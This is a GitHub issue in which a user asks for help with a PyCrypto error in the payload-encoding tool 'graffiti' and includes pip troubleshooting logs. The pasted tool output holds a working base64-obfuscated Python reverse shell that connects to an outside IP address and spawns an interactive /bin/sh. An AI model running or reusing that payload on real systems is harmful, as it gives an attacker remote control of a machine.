Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

PyCrypto is being called from 2 #2

Open
discoweasel opened this issue Jan 15, 2021 · 0 comments
Open

PyCrypto is being called from 2 #2

discoweasel opened this issue Jan 15, 2021 · 0 comments

Comments

@discoweasel
Copy link

discoweasel commented Jan 15, 2021

I know this is a python issue but I'm wondering if anyone may know a resolution for the issue? I've tried everything I could think of.

This error is returned

graffiti -p /linux/python/socket_reverse.json -c base64 -lH -lP 4321
'# you need to install PyCrypto in order to use AES encoding pip install pycrypto
python -c 'exec("aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjk5LjE4MC45My4xNTIiLDQzMjEpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pOw==".decode("base64"))'

Tried to reinstall.

pip install pycrypto -v
User install by explicit request
Created temporary directory: /tmp/pip-ephem-wheel-cache-0b0kgcmo
Created temporary directory: /tmp/pip-req-tracker-xu650tye
Initialized build tracking at /tmp/pip-req-tracker-xu650tye
Created build tracker: /tmp/pip-req-tracker-xu650tye
Entered build tracker: /tmp/pip-req-tracker-xu650tye
Created temporary directory: /tmp/pip-install-4jpp0sd6
Requirement already satisfied: pycrypto in /usr/lib/python3/dist-packages (2.6.1)
Removed build tracker: '/tmp/pip-req-tracker-xu650tye'

Tried to uninstall

pip uninstall pycrypto
Found existing installation: pycrypto 2.6.1
Not uninstalling pycrypto at /usr/lib/python3/dist-packages, outside environment /usr
Can't uninstall 'pycrypto'. No files were found to uninstall.

Reinstalled over it

pip install pycrypto -v
User install by explicit request
Created temporary directory: /tmp/pip-ephem-wheel-cache-0b0kgcmo
Created temporary directory: /tmp/pip-req-tracker-xu650tye
Initialized build tracking at /tmp/pip-req-tracker-xu650tye
Created build tracker: /tmp/pip-req-tracker-xu650tye
Entered build tracker: /tmp/pip-req-tracker-xu650tye
Created temporary directory: /tmp/pip-install-4jpp0sd6
Requirement already satisfied: pycrypto in /usr/lib/python3/dist-packages (2.6.1)
Removed build tracker: '/tmp/pip-req-tracker-xu650tye'

No luck.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant